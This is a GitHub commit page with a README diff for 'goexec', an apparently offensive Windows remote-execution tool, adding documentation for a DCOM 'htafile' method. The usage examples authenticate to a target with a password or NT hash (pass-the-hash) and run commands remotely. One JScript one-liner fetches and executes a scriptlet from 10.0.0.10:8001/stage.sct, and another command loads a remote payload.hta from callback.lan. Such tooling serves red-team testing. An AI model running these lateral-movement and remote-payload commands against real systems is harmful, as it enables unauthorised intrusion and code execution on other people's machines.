Skip to content

Commit 0c0a1d0

Browse files
bryanmcnultybryanmcnulty
committed
docs: +htafile info,examples
1 parent 8da86fa commit 0c0a1d0

1 file changed

Lines changed: 48 additions & 0 deletions

File tree

README.md

Lines changed: 48 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -207,6 +207,7 @@ Available Commands:
207207
mmc Execute with the MMC20.Application DCOM object
208208
shellwindows Execute with the ShellWindows DCOM object
209209
shellbrowserwindow Execute with the ShellBrowserWindow DCOM object
210+
htafile Execute with the HTAFile DCOM object
210211
211212
... [inherited flags] ...
212213
@@ -334,6 +335,53 @@ goexec dcom shellbrowserwindow "$target" \
334335
--app-window 3
335336
```
336337

338+
#### `htafile` Method (`dcom htafile`)
339+
340+
The `htafile` method uses the exposed HTML Application object to call [`IPersistMoniker.Load`](https://learn.microsoft.com/en-us/previous-versions/aa458529(v=msdn.10)) with a client-supplied [URL moniker](https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-oshared/4948a119-c4e4-46b6-9609-0525118552e8). The URL can point to a URL of any format supported by `mshta.exe`.
341+
342+
```text
343+
Usage:
344+
goexec dcom htafile [target] [flags]
345+
346+
Execution:
347+
-U, --url URL Load custom URL
348+
--js string Execute JavaScript one-liner
349+
--vbs string Execute VBScript one-liner
350+
-e, --exec executable Remote Windows executable to invoke
351+
-a, --args string Process command line arguments
352+
-c, --command string Windows process command line (executable & arguments)
353+
-o, --out file Fetch execution output to file or "-" for standard output
354+
-m, --out-method string Method to fetch execution output (default "smb")
355+
--out-timeout duration Output timeout duration (default 1m0s)
356+
--no-delete-out Preserve output file on remote filesystem
357+
358+
... [inherited flags] ...
359+
```
360+
361+
##### Examples
362+
363+
```shell
364+
# Execute `net user` + print output
365+
goexec dcom htafile "$target" \
366+
--user "${auth_user}@${domain}" \
367+
--password "$auth_pass" \
368+
--command 'net user' \
369+
--out -
370+
371+
# Execute blind WSH JavaScript one-liner using admin NT hash
372+
goexec dcom htafile "$target" \
373+
--user "${auth_user}@${domain}" \
374+
--nt-hash "$auth_nt" \
375+
--js 'GetObject("script:http://10.0.0.10:8001/stage.sct").Exec();close()'
376+
377+
# Execute remote HTA file using admin NT hash
378+
goexec dcom htafile "$target" \
379+
--user "${auth_user}@${domain}" \
380+
--nt-hash "$auth_nt" \
381+
--url "http://callback.lan/payload.hta"
382+
```
383+
384+
337385
### Task Scheduler Module (`tsch`)
338386

339387
The `tsch` module makes use of the Windows Task Scheduler service ([MS-TSCH](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/)) to spawn processes on the remote target.

0 commit comments

Comments
 (0)